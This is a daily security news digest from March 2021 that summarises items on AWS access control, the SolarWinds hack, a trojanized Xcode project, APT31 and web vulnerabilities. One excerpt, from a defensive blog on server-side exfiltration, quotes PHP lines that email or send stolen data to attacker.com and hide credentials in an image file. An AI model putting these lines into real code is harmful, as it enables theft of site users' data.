17-03-202119-03-2021

Security daily (18-03-2021)

How to scale your authorization needs by using attribute-based access control with S3

In this blog post, we show you how to scale your Amazon Simple Storage Service (Amazon S3) authorization strategy as an alternative to using path based authorization. You are going to combine attribute-based access control (ABAC) using AWS Identity and Access Management (IAM) with a standard Active Directory Federation Services (AD FS) connected to Microsoft […] (AWS Security Blog)

Highlights from the latest AWS Identity launches

Here is the latest from AWS Identity from November 2020 through February 2021. The features highlighted in this blog post can help you manage and secure your Amazon Web Services (AWS) environment. Identity services answer the question of who has access to what. They enable you to securely manage identities, resources, and permissions at scale and […] (AWS Security Blog)

Feds aren't well prepared to spot SolarWinds-style hacks at agencies, CISA official says

In one of the bluntest assessments of U.S. government security shortcomings around the SolarWinds hack, a top Department of Homeland Security official told senators on Thursday that federal defenses simply aren’t aligned properly to detect advanced attackers. The testimony before the Senate Homeland Security and Governmental Affairs Committee on federal cybersecurity weaknesses points to a forthcoming reorientation of how DHS’s Cybersecurity and Infrastructure Security Agency protects agencies from threats. It’s a shift resulting from the fallout from the hack at federal contractor SolarWinds that resulted in breaches at numerous federal agencies and major technology companies. And it’s a shift that Congress is aiding with $650 million that it recently appropriated for CISA. “Part of the challenge is that you can only secure what you can see,” Brandon Wales, acting director of the agency, told committee Chairman Gary Peters, D-Mich. “Over the past decade our system of protection has largely relied […] The post Feds aren't well prepared to spot SolarWinds-style hacks at agencies, CISA official says appeared first on CyberScoop. (CyberScoop)

Hackers target Apple developers with backdoor

Hackers appear to be targeting Apple developers with a backdoor that has worked its way into a shared Xcode project, according to SentinelOne research published Thursday. In a blog post, SentinelOne says an external researcher alerted the company about malicious code that was tainting a development project in Xcode, Apple’s integrated development environment (IDE) for macOS. The nefarious project, which the researchers say abuses the Run Script feature in Xcode, is a malicious version of an open-source project that’s been available on GitHub that’s intended to help developers with features in animating the iOS Tab Bar. The attackers have made a version of the project to execute a malicious script and target a victim’s development machine with a backdoor. If they leverage the backdoor properly the attackers could record through the victim’s microphone or camera, or log keystrokes from their keyboard. The hackers could also upload or download files, according […] The post Hackers target Apple developers with backdoor appeared first on CyberScoop. (CyberScoop)

Finland implicates China-linked APT31 in parliament hack

The Finnish government has blamed a group of suspected Chinese spies for hacking into the Finnish parliament last year and accessing emails. In a statement Thursday, Finnish intelligence officials pointed the finger at APT31, a hacking group that security researchers say operates on behalf of Chinese interests. The intrusions began last fall and were revealed in December, when the speaker of the Finnish parliament described it as  “hostile cyber activity” that could harm Finnish interests. The Finnish Security and Intelligence Service labeled it a state-backed operation. That statement said APT31 was responsible, but did not name China directly. Separately, Finnish police on Thursday describe the hacking as “aggravated espionage” and “message interception.” The Finnish statements are part of a pattern of increased willingness of U.S. allies in Europe to blame specific hacking groups for spying campaigns. Viktor Rantala, a Finnish scholar, said it was the first time that he could recall that […] The post Finland implicates China-linked APT31 in parliament hack appeared first on CyberScoop. (CyberScoop)

Cypriot sentenced for email hacking committed as teen

A 22-year-old from Cyprus was sentenced to a year in prison after pleading guilty to computer fraud conspiracy and computer fraud for hacking websites and extorting them for money, the Department of Justice announced Thursday. The Cypriot, Joshua Polloso Epifaniou, exploited security vulnerabilities to steal sensitive personal information from user and customer databases between October 2014 and November 2016, when he was a teen living with his mother, according to the Department of Justice. Epifaniou used the stolen information to log into email accounts and send messages to victim websites demanding a ransom and threatening to leak the sensitive data. Epifaniou also obtained information on targets from a co-conspirator who had previously hacked the websites. Epifaniou targeted a Turner Broadcasting System-owned sports news website in Georgia, a hardware company in New York, an online game publisher in California, a consumer report website in Arizona and an employment website located in […] The post Cypriot sentenced for email hacking committed as teen appeared first on CyberScoop. (CyberScoop)

S3 Ep24: How not to get snooped, scammed or hoaxed [Podcast]

Latest episode - listen now! (Naked Security)

State-Sponsored Threat Groups Target Telcos, Steal 5G Secrets

(News ≈ Packet Storm)

Attackers Are Trying Hard To Backdoor iOS Developer's Macs

(News ≈ Packet Storm)

Florida Mother, Daughter Charged With Hacking Homecoming Queen Election

(News ≈ Packet Storm)

Google Cloud: Here Are The Six Best Vulnerabilities Security Researchers Found Last Year

(News ≈ Packet Storm)

Server Side Data Exfiltration via Telegram API

One of the themes commonly highlighted on this blog includes the many creative methods and techniques attackers employ to steal data from compromised websites. Credit card skimmers, credential and password hijackers, SQL injections, and even malware on the server level can be used for data exfiltration. What’s more, attackers may be able to accomplish this feat with a few mere lines of code. For example: Emailing the data: @mail("email@attacker.com", $SERVER["SERVERNAME"], $stolenData); Writing the data to a local file: fwrite($fh, $stolenData); Sending the data to an email address under the attacker’s control: @filegetcontents("http://attacker.com/cgi-bin/optimus.pl?prime=$stolenData"); Writing the data to an image file within the website to avoid raising suspicion: $hellowp=fopen('./wp-content/uploads/2018/07/[redacted].jpg','a+'); $write=fwrite($hellowp,$username_password,$time); Harvesting & Exfiltrating Stolen Data via Telegram One interesting technique our team has come across in recent months leverages the Telegram API to exfiltrate stolen data and send it in a private message to a bot under the attackers control. Continue reading Server Side Data Exfiltration via Telegram API at Sucuri Blog. (Sucuri Blog)

Critical RCE Flaw Reported in MyBB Forum Software—Patch Your Sites

A pair of critical vulnerabilities in a popular bulletin board software called MyBB could have been chained together to achieve remote code execution (RCE) without the need for prior access to a privileged account. The flaws, which were discovered by independent security researchers Simon Scannell and Carl Smith, were reported to the MyBB Team on February 22, following which it released an (The Hacker News)

How to Successfully Pursue a Career in Malware Analysis

Are you looking to becoming a malware analyst? Then continue reading to discover how to gain the training you need and start a career in malware analysis career.Did you know that new malware is released every seven seconds? As more and more systems become reliant on the internet, the proliferation of malware becomes increasingly destructive. Once upon a time, a computer virus might cause (The Hacker News)

Why Cached Credentials Can Cause Account Lockouts and How to Stop it

When a user account becomes locked out, the cause is often attributed to a user who has simply entered an old or incorrect password too many times. However, this is far from being the only thing that can cause an account to become locked. Another common cause, for example, is an application or script that is configured to log into the system using an old password. Perhaps the most easily (The Hacker News)

Fiserv Forgets to Buy Domain It Used as System Default

Fintech security provider Fiserv acknowledges it used unregistered domain as default email. (Threatpost)

Trojanized Xcode Project Slips MacOS Malware to Apple Developers

In a new campaign, threat actors are bundling macOS malware in trojanized Apple Xcode developer projects. (Threatpost)

Zoom Screen-Sharing Glitch ‘Briefly’ Leaks Sensitive Data

A glitch in Zoom's screen-sharing feature shows parts of presenters' screens that they did not intend to share - potentially leaking emails or passwords. (Threatpost)

Security Researcher Hides ZIP, MP3 Files Inside PNG Files on Twitter

The newly discovered steganography method could be exploited by threat actors to obscure nefarious activity inside photos hosted on the social-media platform. (Threatpost)

Tutor LMS for WordPress Open to Info-Stealing Security Holes

The popular learning-management system for teacher-student communication is rife with SQL-injection vulnerabilities. (Threatpost)

17-03-202119-03-2021

/security-daily/ 19-03-2021 23:44:23